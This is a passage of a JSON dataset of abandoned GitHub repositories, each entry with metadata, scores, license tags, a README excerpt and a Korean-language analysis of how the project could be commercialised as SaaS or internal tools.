assistance](https://github.com/hpcloud/tail/labels/Windows) for full Windows support.\n","composite_score":0.5201,"license_safety_tag":"safe"},{"name":"vuejs-templates/pwa","github_url":"https://github.com/vuejs-templates/pwa","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":95,"description":"# vuejs-templates/pwa 평가 보고서\n\n## 왜 보물인가\n스마트폰 앱처럼 동작하면서도 웹브라우저에서 작동하는 앱을 빠르게 만들 수 있는 시작 템플릿입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 오프라인에서도 작동하는 웹 기반 협업 도구 (메모, 할일 관리 등)\n2. **내부 업무 도구**: 스마트폰과 PC에서 동시에 사용","readme_excerpt":"## Maintenance Mode\n**The code in this repo is in maintenance mode, with limited plans for future changes. Our focus moving forward is adding PWA support to [Vue CLI 3.0](https://github.com/vuejs/vue-cli/blob/dev/README.md), using its new [`pwa` plugin](https://github.com/vuejs/vue-cli/tree/dev/packages/%40vue/cli-plugin-pwa). We encourage this work to be used for new projects as it is being actively developed. If you have issues with the current codebase, give the new version a spin and let us know what you think.**\n\n# vue-pwa-boilerplate\n\n> A full-featured [PWA](https://developers.google.com/web/progressive-web-apps/) template with webpack, hot-reload, lint-on-save, unit testing & css extraction.\n\n## Documentation\n\n- This template builds on top of the main webpack template, so please refer to the [webpack template docs](http://vuejs-templates.github.io/webpack).\n\n- Check out the [official Vue.js guide](http://vuejs.org/guide/) for general information about Vue that is not specific to","composite_score":0.52,"license_safety_tag":"safe"},{"name":"thomasp85/ggplot2_workshop","github_url":"https://github.com/thomasp85/ggplot2_workshop","stars":499,"language":"","license":"unknown","abandonment_months":75,"description":"# ggplot2_workshop 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 이해하기 쉬운 그래프로 만드는 방법을 배울 수 있는 실용적인 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 시각화 SaaS**: 기업의 판매 현황, 고객 분석 등을 자동으로 예쁜 그래프로 변환해주는 웹 서비스\n2. **내부 업무 도구**: 대시보드 시스템을 구축","readme_excerpt":"# Drawing Anything with ggplot2\n\n*Workshop material*\n\nThis repository collects material for a ~4 hour workshop first taught at celebRation2020 in Copenhagen\n\n[Workshop Video on YouTube](https://www.youtube.com/watch?v=h29g21z0a68)\n","composite_score":0.52,"license_safety_tag":"unknown"},{"name":"changkun/go-under-the-hood","github_url":"https://github.com/changkun/go-under-the-hood","stars":6,"language":"Go","license":"MIT","abandonment_months":32,"description":"# changkun/go-under-the-hood 분석\n\n## 왜 보물인가\nGo 프로그래밍 언어의 내부 동작 원리를 상세히 설명하는 교육 자료로, 프로그래머들이 더 효율적이고 안정적인 소프트웨어를 만드는 데 필수적인 지식을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 SaaS**: 프로그래밍 학습 구독 서비스에서 심화 강의 콘텐츠","readme_excerpt":"<img src=\"book/assets/cover-cn-v3.png\" alt=\"logo\" height=\"450\" align=\"right\" style=\"margin: 5px; margin-bottom: 20px;\" />\n\n# Go 语言原本\n\n当前内容基于 `go1.15`\n\n![](https://img.shields.io/badge/lang-简体中文-red.svg?longCache=true)\n![](https://img.shields.io/github/license/golang-design/under-the-hood.svg)\n![](https://img.shields.io/badge/license-CC%20BY--NC--ND%204.0-lightgrey.svg)\n[![](https://img.shields.io/badge/捐赠-微信-68b600.svg?logo=WeChat)](https://golang.design/under-the-hood/assets/wechat.jpg)\n[![](https://img.shields.io/badge/捐赠-支付宝-00a2ef.svg?logo=AliPay)](https://golang.design/under-the-hood/assets/alipay.jpg)\n[![](https://img.shields.io/badge/捐赠-PayPal-104098.svg?logo=PayPal)](https://www.paypal.me/changkunde/4.99eur) ![](https://changkun.de/urlstat?mode=github&repo=golang-design/under-the-hood)\n\nGo 语言从 2009 年诞生之初已有十余年的历史。\n纵观大多数编程语言的历史进程，令人惊讶的是 Go 语言自身在进化的这十余年间，\n语言本身并未发生太大变化，Go 语言的用户能够持续不断写出向后兼容的应用。\n从语言设计的角度而言，作为一门从诞生之初就考虑低成本、高并发、简洁等原则的语言，\n很难让人不对其简洁设计背后的各项实现机制以及具体工作原理所好奇。\n本书就是一本讨论 Go 语言源","composite_score":0.5199,"license_safety_tag":"safe"},{"name":"golang-design/under-the-hood","github_url":"https://github.com/golang-design/under-the-hood","stars":7,"language":"Go","license":"MIT","abandonment_months":32,"description":"# golang-design/under-the-hood 분석\n\n## 왜 보물인가\nGo 프로그래밍 언어의 내부 동작 원리를 한국어로 설명하는 드문 학습 자료로, 소프트웨어 개발자들의 기술 수준을 한 단계 올릴 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: Go 언어 개발자 교육 플랫폼으로 운영하며 월 구독료 수익 창출\n- **내부 업무","readme_excerpt":"<img src=\"book/assets/cover-cn-v3.png\" alt=\"logo\" height=\"450\" align=\"right\" style=\"margin: 5px; margin-bottom: 20px;\" />\n\n# Go 语言原本\n\n当前内容基于 `go1.15`\n\n![](https://img.shields.io/badge/lang-简体中文-red.svg?longCache=true)\n![](https://img.shields.io/github/license/golang-design/under-the-hood.svg)\n![](https://img.shields.io/badge/license-CC%20BY--NC--ND%204.0-lightgrey.svg)\n[![](https://img.shields.io/badge/捐赠-微信-68b600.svg?logo=WeChat)](https://golang.design/under-the-hood/assets/wechat.jpg)\n[![](https://img.shields.io/badge/捐赠-支付宝-00a2ef.svg?logo=AliPay)](https://golang.design/under-the-hood/assets/alipay.jpg)\n[![](https://img.shields.io/badge/捐赠-PayPal-104098.svg?logo=PayPal)](https://www.paypal.me/changkunde/4.99eur) ![](https://changkun.de/urlstat?mode=github&repo=golang-design/under-the-hood)\n\nGo 语言从 2009 年诞生之初已有十余年的历史。\n纵观大多数编程语言的历史进程，令人惊讶的是 Go 语言自身在进化的这十余年间，\n语言本身并未发生太大变化，Go 语言的用户能够持续不断写出向后兼容的应用。\n从语言设计的角度而言，作为一门从诞生之初就考虑低成本、高并发、简洁等原则的语言，\n很难让人不对其简洁设计背后的各项实现机制以及具体工作原理所好奇。\n本书就是一本讨论 Go 语言源","composite_score":0.5199,"license_safety_tag":"safe"},{"name":"jxnblk/styled-system","github_url":"https://github.com/jxnblk/styled-system","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":29,"description":"# styled-system (jxnblk/styled-system) 분석\n\n## 왜 보물인가\n웹사이트 디자인을 일관되게 만들어주는 기초 도구로, 기업이 브랜드 통일성을 유지하면서 빠르게 화면을 만들 수 있게 해줍니다.\n\n## 어디에 �Used 수 있나\n1. **SaaS 서비스**: 대시보드나 관리 화면이 많은 협업 도구들이 빠르게 UI를 구축할 때 활용\n","readme_excerpt":"<img src='https://styled-system.com/logo.svg' width='128' height='128' />\n\n# Styled System\n\nResponsive, theme-based style props for building design systems with React\nhttps://styled-system.com\n\n[![stars][]][github]\n[![Build Status][circleci-badge]][circleci]\n[![Downloads][]][npm]\n[![Version][]][npm]\n[![spectrum-badge][]][spectrum]\n![size][]\n![MIT License][license]\n[![system-ui/theme][system-ui-badge]](https://system-ui.com/theme)\n\n[version]: https://flat.badgen.net/npm/v/styled-system\n[downloads]: https://flat.badgen.net/npm/dm/styled-system\n[license]: https://flat.badgen.net/badge/license/MIT/blue\n[stars]: https://flat.badgen.net/github/stars/styled-system/styled-system\n[size]: https://flat.badgen.net/bundlephobia/minzip/styled-system\n[spectrum-badge]: https://flat.badgen.net/badge/spectrum/community/purple\n[system-ui-badge]: https://flat.badgen.net/badge/system-ui/theme/black\n[npm]: https://npmjs.com/package/styled-system\n[github]: https://github.com/styled-system/styled-system\n[spec","composite_score":0.5199,"license_safety_tag":"safe"},{"name":"fossasia/open-event-orga-app","github_url":"https://github.com/fossasia/open-event-orga-app","stars":12,"language":"Java","license":"Apache-2.0","abandonment_months":57,"description":"# Open Event Orga App 평가\n\n## 왜 보물인가\n행사(컨퍼런스, 페스티벌, 세미나 등)를 온라인으로 쉽게 관리하고 참석자들과 소통할 수 있는 앱으로, 행사 주최자들의 운영 부담을 크게 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월간 구독형으로 중소 행사 주최사에 \"행사 운영 관리 플랫폼\"으로 제공\n2. **내부 업","readme_excerpt":"![Open Event Organizer](docs/images/organizer_app_branding.png)\n\n\n## Open Event Organizer Android App\n\n[![Build Status](https://img.shields.io/travis/fossasia/open-event-organizer-android/development.svg)](https://travis-ci.org/fossasia/open-event-organizer-android)\n[![Codacy Grade](https://img.shields.io/codacy/grade/d6ae120356c94c0d94d6449ec540f520.svg)](https://www.codacy.com/app/mb/open-event-organizer-android)\n[![Codecov Coverage](https://img.shields.io/codecov/c/github/fossasia/open-event-organizer-android/development.svg)](https://codecov.io/gh/fossasia/open-event-organizer-android)\n[![Appetize Preview](https://img.shields.io/badge/Preview-appetize.io-673AB7.svg)](https://appetize.io/app/w8v8z7pc9aewargb2uuyf108f0)\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff006f.svg)](https://gitter.im/fossasia/open-event-organizer-android)\n[![Twitter Follow](https://img.shields.io/twitter/follow/eventyay.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://tw","composite_score":0.5198,"license_safety_tag":"safe"},{"name":"gsoft-inc/craco","github_url":"https://github.com/gsoft-inc/craco","stars":6,"language":"TypeScript","license":"Apache-2.0","abandonment_months":29,"description":"# gsoft-inc/craco 분석 보고서\n\n## 왜 보물인가\n복잡한 웹 개발 설정을 간단하게 만들어주는 도구로, 개발자들이 더 빠르게 서비스를 만들 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 애플리케이션 개발 플랫폼**: 기업용 소프트웨어나 협업 도구를 빠르게 만들고 배포하는 SaaS 서비스\n2. **개발사 내부 도구**: 소프트웨어 ","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://craco.js.org\">\n    <img src=\"https://craco.js.org/img/craco.png\" width=\"200\" height=\"200\">\n  </a>\n  <h1>CRACO</h1>\n  <p>\n  \n**C**reate **R**eact **A**pp **C**onfiguration **O**verride, an easy and comprehensible configuration layer for create-react-app.\n\n**Find config docs, API docs, plugins, and example configs at [craco.js.org](https://craco.js.org)!**\n\n  </p>\n\n  <br>\n\n[![npm status](https://img.shields.io/npm/v/@craco/craco.svg)](https://www.npmjs.com/package/@craco/craco) [![npm downloads](https://img.shields.io/npm/dm/@craco/craco.svg)](https://www.npmjs.com/package/@craco/craco) [![npm license](https://img.shields.io/npm/l/@craco/craco?color=orange)](https://github.com/dilanx/craco/blob/main/packages/craco/LICENSE) [![GitHub stars](https://img.shields.io/github/stars/dilanx/craco?color=red)](https://github.com/dilanx/craco) [![GitHub contributors](https://img.shields.io/github/contributors/dilanx/craco?color=blueviolet)](https://github.com/","composite_score":0.5196,"license_safety_tag":"safe"},{"name":"ChrisAnd1998/TaskbarX","github_url":"https://github.com/ChrisAnd1998/TaskbarX","stars":5,"language":"Visual Basic .NET","license":"MIT","abandonment_months":29,"description":"# TaskbarX 저장소 분석\n\n## 왜 보물인가\nWindows 작업 표시줄을 자신의 취향대로 꾸밀 수 있는 도구로, 컴퓨터 화면을 더 예쁘고 편하게 만들고 싶은 사용자들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 월 구독 형태로 TaskbarX Pro를 클라우드 기반 설정 동기화 기능과 함께 판매 (여러 PC에서 설정 자","readme_excerpt":"\n# TaskbarX\n\n\n![rsz_hero2](https://user-images.githubusercontent.com/50437199/90984468-6c5a1a00-e575-11ea-9af0-a874115e07e7.png)\n  \nTaskbarX gives you control over the position of your taskbar icons.\nTaskbarX will give you an original Windows dock like feel. The icons will move to the center or user given position when an icon gets added or removed from the taskbar. You will be given the option to choose between a variety of different animations and change their speeds. The animations can be disabled if you don't like animations and want them to move in an instant. The center position can also be changed to bring your icons more to the left or right based on the center position. Currently all taskbar settings are supported including the vertical taskbar and unlimited taskbars.\nTaskbarX has been in development since 6 may 2018. Also known as FalconX and Falcon10.\n&nbsp;  \n  \n![aa4](https://user-images.githubusercontent.com/50437199/79305152-1c968280-7ef3-11ea-9eda-c97f61b758bd.png)\n&nbs","composite_score":0.5196,"license_safety_tag":"safe"},{"name":"aspnet/Logging","github_url":"https://github.com/aspnet/Logging","stars":499,"language":"C#","license":"Apache-2.0","abandonment_months":92,"description":"# aspnet/Logging 분석 보고서\n\n## 왜 보물인가\n마이크로소프트가 만든 공식 로깅 도구로, 웹사이트나 앱에서 발생하는 모든 문제를 자동으로 기록하고 추적할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 협업 도구에서 사용자 활동과 시스템 오류를 실시간으로 모니터링\n2. **내부 업무 도구**: 기업의 전사","readme_excerpt":"Logging\n=======\n\n**This GitHub project has been archived.** Ongoing development on this project can be found in <https://github.com/aspnet/Extensions>.\n\nCommon logging abstractions and a few implementations. Refer to the [wiki](https://github.com/aspnet/Logging/wiki) for more information\n\nThis project is part of ASP.NET Core. You can find samples, documentation and getting started instructions for ASP.NET Core at the [AspNetCore](https://github.com/aspnet/AspNetCore) repo.\n\n## Providers\n\nCommunity projects adapt _Microsoft.Extensions.Logging_ for use with different back-ends.\n\n * [Sentry](https://github.com/getsentry/sentry-dotnet) - provider for the [Sentry](https://github.com/getsentry/sentry) service\n * [Serilog](https://github.com/serilog/serilog-framework-logging) - provider for the Serilog library\n * [elmah.io](https://github.com/elmahio/Elmah.Io.Extensions.Logging) - provider for the elmah.io service\n * [Loggr](https://github.com/imobile3/Loggr.Extensions.Logging) - provider for","composite_score":0.5196,"license_safety_tag":"safe"},{"name":"discordjs/Commando","github_url":"https://github.com/discordjs/Commando","stars":499,"language":"JavaScript","license":"Apache-2.0","abandonment_months":58,"description":"# Discord.js Commando 저장소 분석\n\n## 왜 보물인가\n디스코드라는 인기 있는 채팅 앱에서 자동응답 봇을 쉽게 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 커뮤니티 관리 SaaS**: 게임 길드/팀이 월정액을 내고 자동화된 봇 관리 기능을 임차하는 서비스\n2. **기업 내부 커뮤니티 플랫폼**: 회사 디스코드 ","readme_excerpt":"# Commando\n[![Discord](https://discordapp.com/api/guilds/222078108977594368/embed.png)](https://discord.gg/bRCvFy9)\n[![Downloads](https://img.shields.io/npm/dt/discord.js-commando.svg)](https://www.npmjs.com/package/discord.js-commando)\n[![Version](https://img.shields.io/npm/v/discord.js-commando.svg)](https://www.npmjs.com/package/discord.js-commando)\n[![Dependency status](https://david-dm.org/discordjs/Commando.svg)](https://david-dm.org/discordjs/Commando)\n[![Build status](https://github.com/discordjs/Commando/workflows/Testing/badge.svg)](https://github.com/discordjs/Commando/actions?query=workflow%3ATesting)\n\n## About\nCommando is the official command framework for [discord.js](https://github.com/discordjs/discord.js).\nIt is flexible, fully object-oriented, easy to use, and makes it trivial to create your own powerful commands.\nAdditionally, it makes full use of ES2017's `async`/`await` functionality for clear, concise code that is simple to write and easy to comprehend.\n\n## Featur","composite_score":0.5194,"license_safety_tag":"safe"},{"name":"vasyl-stanislavchuk/angular-slick","github_url":"https://github.com/vasyl-stanislavchuk/angular-slick","stars":499,"language":"ApacheConf","license":"MIT","abandonment_months":86,"description":"# angular-slick 상업화 분석\n\n## 왜 보물인가\n웹사이트에서 이미지나 콘텐츠를 슬라이드쇼처럼 자동으로 넘기는 기능을 쉽게 만들 수 있는 도구로, 499개 프로젝트에서 이미 검증된 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 SaaS**: 온라인 쇼핑몰을 만드는 플랫폼에서 상품 이미지 슬라이드 기능 제공\n2. **내부 업","readme_excerpt":"angular-slick\n=============\n\nAngular directive for [slick](https://github.com/kenwheeler/slick/) jquery carousel. Demo is [here](http://vasyabigi.github.io/angular-slick/).\n\n### Usage:\n\n- Install: `bower install angular-slick`\n- Add `jquery`, `angular`, `slick-carousel` and `angular-slick` to your code:\n\n```html\n<link rel=\"stylesheet\" href=\"bower_components/slick-carousel/slick/slick.css\">\n<link rel=\"stylesheet\" href=\"bower_components/slick-carousel/slick/slick-theme.css\">\n<script src=\"bower_components/jquery/jquery.js\"></script>\n<script src=\"bower_components/angular/angular.js\"></script>\n<script src=\"bower_components/slick-carousel/slick/slick.js\"></script>\n<script src=\"bower_components/angular-slick/dist/slick.js\"></script>\n```\n\n- Add a dependency to the `slick` module in your application.\n\n```js\nangular.module('MyApp', ['slick']);\n```\n\n- Add a `slick` element to your html:\n\n```html\n<slick>\n  ...\n</slick>\n\n<slick infinite=true slides-to-show=3 slides-to-scroll=3>\n  ...\n</slick>\n\n<sli","composite_score":0.5193,"license_safety_tag":"safe"},{"name":"xiuweikang/IM","github_url":"https://github.com/xiuweikang/IM","stars":499,"language":"Java","license":"unknown","abandonment_months":133,"description":"# xiuweikang/IM 저장소 분석\n\n## 왜 보물인가\n메신저나 채팅 앱처럼 사용자끼리 실시간으로 메시지를 주고받을 수 있는 기술을 만들 수 있다는 점이 주목할 만합니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 도구**: 직원들이 사내에서만 사용하는 메신저 서비스로 운영\n2. **고객 지원 시스템**: 고객센터에서 상담원과 고객이 실시간으로 대화","readme_excerpt":"# IM\n简单的仿QQ聊天安卓APP\n\n该项目用JAVA的socket实现，包含客户端，服务器与数据库，如果想运行需要注意一下几点：\n\n 1. 服务器更改配置文件dbcpconfig.properties\n 2. 我已经将所需的依赖库也上传了，如果还缺少某些依赖库，需要你自己去下\n 3. 注意客户端的端口号应与服务器的端口号一致。\n 4. 客户端出现服务器异常时，请注意客户端的SERVER_IP，需要保证客户端ping通服务器\n \n###运行效果图：\n\n![image](https://github.com/xiuweikang/IM/raw/master/screenshot/login.png)![image](https://github.com/xiuweikang/IM/raw/master/screenshot/register1.png)![image](https://github.com/xiuweikang/IM/raw/master/screenshot/register2.png)![image](https://github.com/xiuweikang/IM/raw/master/screenshot/search.png)![image](https://github.com/xiuweikang/IM/raw/master/screenshot/messageTab.png)![image](https://github.com/xiuweikang/IM/raw/master/screenshot/chat.png)\n\n##该APP的部分UI参考网上流传的高仿陌陌,在此表示感谢。\n","composite_score":0.5192,"license_safety_tag":"unknown"},{"name":"TaleLin/lin-ui","github_url":"https://github.com/TaleLin/lin-ui","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":34,"description":"# TaleLin/lin-ui 평가 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 디자인 부품들을 모아놓은 도구 모음으로, 개발자들이 처음부터 다시 만드는 번거로움을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **스타트업 웹앱 개발 서비스**: 작은 팀이 빠르게 서비스를 출시해야 할 때 이 도구를 활용해 개발 기간을 단축하고 비용을 절감하는 S","readme_excerpt":"<p align=\"center\">\n    <img width=\"150\" class=\"QR-img\" src=\"https://doc.mini.talelin.com/screenshots/readme/lin-ui小程序.jpg\">\n</p>\n\n\n<div align=\"center\">\n    <span><a target=\"_blank\" href=\"https://doc.mini.talelin.com\">:memo: 中文文档</a></span>\n    <span>|</span>\n    <span><a target=\"_blank\" href=\"https://talelin.com/\">:computer: 官方教程</a></span>\n</div>\n\n<div align=\"center\">\n    <span>Lin UI, not just an UI component library!</span><br/>\n    <strong>一套基于微信小程序原生语法实现的高质量 UI 组件库</strong>\n</div>\n\n<div align=\"center\">\n    <a href=\"https://github.com/TaleLin/lin-ui/actions\">\n        <img alt=\"持续集成\" src=\"https://img.shields.io/github/workflow/status/talelin/lin-ui/Node.js%20CI/develop?label=%E6%8C%81%E7%BB%AD%E9%9B%86%E6%88%90&logo=github\" />\n    </a>\n    <a href=\"https://www.npmjs.com/package/lin-ui\">\n        <img alt=\"最新版本\" src=\"https://img.shields.io/npm/v/lin-ui?color=%233a63bd&label=%E6%9C%80%E6%96%B0%E7%89%88%E6%9C%AC&logo=graphcool&logoColor=white\" />\n    </a>\n    <a href=\"https://www.npmjs.","composite_score":0.5192,"license_safety_tag":"safe"},{"name":"mozilla-mobile/android-components","github_url":"https://github.com/mozilla-mobile/android-components","stars":8,"language":"Kotlin","license":"MPL-2.0","abandonment_months":43,"description":"# mozilla-mobile/android-components 보물 분석\n\n## 왜 보물인가\n파이어폭스 브라우저를 만드는 Mozilla가 직접 개발한 안드로이드 앱 개발 부품들이므로, 검증된 기술과 신뢰성을 바탕으로 모바일 앱을 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 안드로이드 기반 모바일 앱 빌더 플랫폼으로","readme_excerpt":"# Android components\n\n[![Task Status](https://firefox-ci-tc.services.mozilla.com/api/github/v1/repository/mozilla-mobile/android-components/main/badge.svg)](https://firefox-ci-tc.services.mozilla.com/api/github/v1/repository/mozilla-mobile/android-components/main/latest)\n[![Mergify Status](https://img.shields.io/endpoint.svg?url=https://gh.mergify.io/badges/mozilla-mobile/android-components&style=flat)](https://mergify.io)\n[![chat.mozilla.org](https://img.shields.io/badge/chat-on%20matrix-51bb9c)](https://chat.mozilla.org/#/room/#android-components:mozilla.org)\n\n_A collection of Android libraries to build browsers or browser-like applications._\n\nℹ️ For more information **[see the website](https://mozilla-mobile.github.io/android-components/)**.\n\nA fully-featured reference browser implementation based on the components can be found in the [reference-browser repository](https://github.com/mozilla-mobile/reference-browser).\n\n# Getting Involved\n\nWe encourage you to participate in this open","composite_score":0.5192,"license_safety_tag":"unknown"},{"name":"30-seconds/30-seconds-of-react","github_url":"https://github.com/30-seconds/30-seconds-of-react","stars":10,"language":"JavaScript","license":"CC-BY-4.0","abandonment_months":37,"description":"# 30-Seconds of React 상품화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 자주 필요로 하는 작은 코드 조각들을 모아놓은 라이브러리로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 교육 플랫폼으로, 월 구독료를 받고 검색 기능과 코드 실행 환경을 제공하는 서비스\n2. **내","readme_excerpt":"> **IMPORTANT NOTICE:**\n>\n> As of May, 2023, all 30-seconds content repositories have been merged into [30-seconds-of-code](https://github.com/30-seconds/30-seconds-of-code).\n>\n> Please watch, star and follow relevant activity there.\n\n[![Logo](/logo.png)](https://30secondsofcode.org/react/p/1)\n\n# 30 seconds of code\n\n> Short React code snippets for all your development needs\n\n* Visit [our website](https://30secondsofcode.org) to view our snippet collection.\n* Use the [Search page](https://30secondsofcode.org/search) to find snippets that suit your needs. You can search by name, tag, language or using a snippet's description. Just start typing a term and see what comes up.\n* Browse the [React Snippet collection](https://30secondsofcode.org/react/p/1) to see all the snippets in this project or click individual tags at the top of the same page to narrow down your search to a specific tag.\n* Click on each snippet card to view the whole snippet, including code, explanation and examples.\n* Yo","composite_score":0.5192,"license_safety_tag":"unknown"},{"name":"JavaNoober/BackgroundLibrary","github_url":"https://github.com/JavaNoober/BackgroundLibrary","stars":8,"language":"Java","license":"Apache-2.0","abandonment_months":39,"description":"# BackgroundLibrary 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트의 화면 배경을 자유롭게 꾸밀 수 있는 도구로, 디자인 작업을 훨씬 쉽고 빠르게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **앱 제작 플랫폼 SaaS**: 코드 모르는 사람들도 앱을 만들 수 있는 노코드 서비스에 통합하여 배경 디자인 기능 제공\n2. **웹사이트 빌더 도","readme_excerpt":"# BackgroundLibrary\nA framework for directly generating shape through Tags, no need to write shape.xml again（通过标签直接生成shape，无需再写shape.xml）  \n\nissue回复不及时，可以添加qq群887686934  \n\n\n![](https://user-gold-cdn.xitu.io/2018/9/11/165c6e5c0cff0548?w=681&h=233&f=png&s=31240)\n\n\n[English.md](https://github.com/JavaNoober/BackgroundLibrary/blob/master/README-EN.md)\n\n依赖方式：\n\n    allprojects {\n        repositories {\n            ...\n            maven { url 'https://jitpack.io' }\n        }\n    }\n\n    implementation \"com.android.support:appcompat-v7:$supportVersion\"\n    implementation 'com.github.JavaNoober.BackgroundLibrary:library:1.7.6'\n\n如果项目使用了androidx：  \n\n    allprojects {\n        repositories {\n            ...\n            maven { url 'https://jitpack.io' }\n        }\n    }\n\n    implementation \"androidx.appcompat:appcompat:$supportVersion\" \n    implementation 'com.github.JavaNoober.BackgroundLibrary:libraryx:1.7.6'\n   \n\n## 使用文档\n\n**无需任何代码，直接加入bl标签属性即可，与原生view无缝衔接**，具体使用方法以及属性内容请查看[wiki](https://github.com/","composite_score":0.5191,"license_safety_tag":"safe"},{"name":"hustvl/YOLOP","github_url":"https://github.com/hustvl/YOLOP","stars":38,"language":"Python","license":"MIT","abandonment_months":32,"description":"# YOLOP 저장소 분석\n\n## 왜 보물인가\n자동차가 도로에서 차선을 인식하고 장애물을 동시에 감지할 수 있게 해주는 기술로, 자율주행차나 운전 보조 시스템의 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **자동차 제조사 대상 SaaS**: 신차 개발 시 차선 인식·장애물 감지 기능을 월 사용료로 제공하는 클라우드 서비스\n2. **운전자 보조 앱**","readme_excerpt":"<div align=\"left\">   \n\n## You Only :eyes: Once for Panoptic ​ :car: Perception\n> [**You Only Look at Once for Panoptic driving Perception**](https://link.springer.com/article/10.1007/s11633-022-1339-y)\n>\n> by Dong Wu, Manwen Liao, Weitian Zhang, [Xinggang Wang](https://xwcv.github.io/)<sup> :email:</sup>, [Xiang Bai](https://scholar.google.com/citations?user=UeltiQ4AAAAJ&hl=zh-CN), [Wenqing Cheng](http://eic.hust.edu.cn/professor/chengwenqing/), [Wenyu Liu](http://eic.hust.edu.cn/professor/liuwenyu/)      [*School of EIC, HUST*](http://eic.hust.edu.cn/English/Home.htm)\n>\n>  (<sup>:email:</sup>) corresponding author.\n>\n> *arXiv technical report ([Machine Intelligence Research2022](https://link.springer.com/article/10.1007/s11633-022-1339-y))*\n\n---\n\n[中文文档](https://github.com/hustvl/YOLOP/blob/main/README%20_CH.md)\n\n### The Illustration of YOLOP\n\n![yolop](pictures/yolop.png)\n\n### Contributions\n\n* We put forward an efficient multi-task network that can jointly handle three crucial tasks in","composite_score":0.5191,"license_safety_tag":"safe"},{"name":"bannzai/SpreadsheetView","github_url":"https://github.com/bannzai/SpreadsheetView","stars":5,"language":"HTML","license":"MIT","abandonment_months":25,"description":"# SpreadsheetView 상용화 분석\n\n## 왜 보물인가\n엑셀처럼 표를 보고 편집할 수 있는 기능을 앱에 쉽게 추가할 수 있어서, 복잡한 데이터를 다루는 비즈니스 솔루션을 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 회계 소프트웨어 SaaS**: 중소기업의 매출·비용 데이터를 표 형태로 입력받고 자동 정산하는 웹 서비스\n**2. 내","readme_excerpt":"<p align=\"center\">\n  <img src=\"Resources/Logo.png\"  style=\"width: 400px;\" width=\"400\" />\n</p>\n\n<p align=\"center\">\n    <a href=\"https://travis-ci.org/kishikawakatsumi/SpreadsheetView\">\n        <img src=\"https://travis-ci.org/kishikawakatsumi/SpreadsheetView.svg?branch=master&style=flat\"\n             alt=\"Build Status\">\n    </a>\n    <a href=\"https://codecov.io/gh/kishikawakatsumi/SpreadsheetView\">\n        <img src=\"https://codecov.io/gh/kishikawakatsumi/SpreadsheetView/branch/master/graph/badge.svg\" alt=\"Codecov\" />\n    </a>\n    <a href=\"https://cocoapods.org/pods/SpreadsheetView\">\n        <img src=\"https://img.shields.io/cocoapods/v/SpreadsheetView.svg?style=flat\"\n             alt=\"Pods Version\">\n    </a>\n    <a href=\"http://cocoapods.org/pods/SpreadsheetView/\">\n        <img src=\"https://img.shields.io/cocoapods/p/SpreadsheetView.svg?style=flat\"\n             alt=\"Platforms\">\n    </a>\n    <a href=\"https://github.com/Carthage/Carthage\">\n        <img src=\"https://img.shields.io/badge/Carth","composite_score":0.5189,"license_safety_tag":"safe"},{"name":"uw-labs/bloomrpc","github_url":"https://github.com/uw-labs/bloomrpc","stars":6,"language":"TypeScript","license":"LGPL-3.0","abandonment_months":41,"description":"# BloomRPC 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 통신 작업을 간단하게 만들어주는 개발자 도구로, 기술 기업들의 내부 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 개발사 내부 도구**: 소프트웨어 개발사들이 자신의 제품 개발 속도를 높이기 위해 구독하는 개발 지원 플랫폼\n2. **API 통합 서비스**: ","readme_excerpt":"<p align=\"center\">\n  <img src=\"./resources/logo.svg\" width=\"256\" height=\"256\"/>\n</p>\n<h1 align=\"center\">BloomRPC</h1>\n\n<p align=\"center\">\n  <img src=\"https://img.shields.io/github/release/uw-labs/bloomrpc.svg\" />\n</p>\n<p align=\"center\">The missing GUI Client for gRPC services 🌸 </p>\n\n<p align=\"center\">Inspired by <b>Postman</b> and <b>GraphQL Playground</b><br/>\n  <b>BloomRPC</b> aims to provide the simplest and most efficient developer experience for exploring\nand querying your GRPC services.\n</p>\n\n## This project was archived in Jan 2023. Its usage is no longer recommended.\n\n\n## Why was this project archived?\n\nWhen BloomRPC was first released in Dec 2018, there were very few GUI gRPC tools available, hence the project tagline: \"The missing GUI client for gRPC services\". It was a good tool for a few years. Unfortunately, the project stalled in development and issues piled up, leaving users frustrated when things weren't working. We no longer felt that BloomRPC offered a good experienc","composite_score":0.5189,"license_safety_tag":"restricted"},{"name":"ruotianluo/pytorch-faster-rcnn","github_url":"https://github.com/ruotianluo/pytorch-faster-rcnn","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":67,"description":"# pytorch-faster-rcnn 상용화 분석\n\n## 왜 보물인가\n사진 속 물체의 위치와 종류를 자동으로 인식하는 기술로, 보안 카메라, 자동차 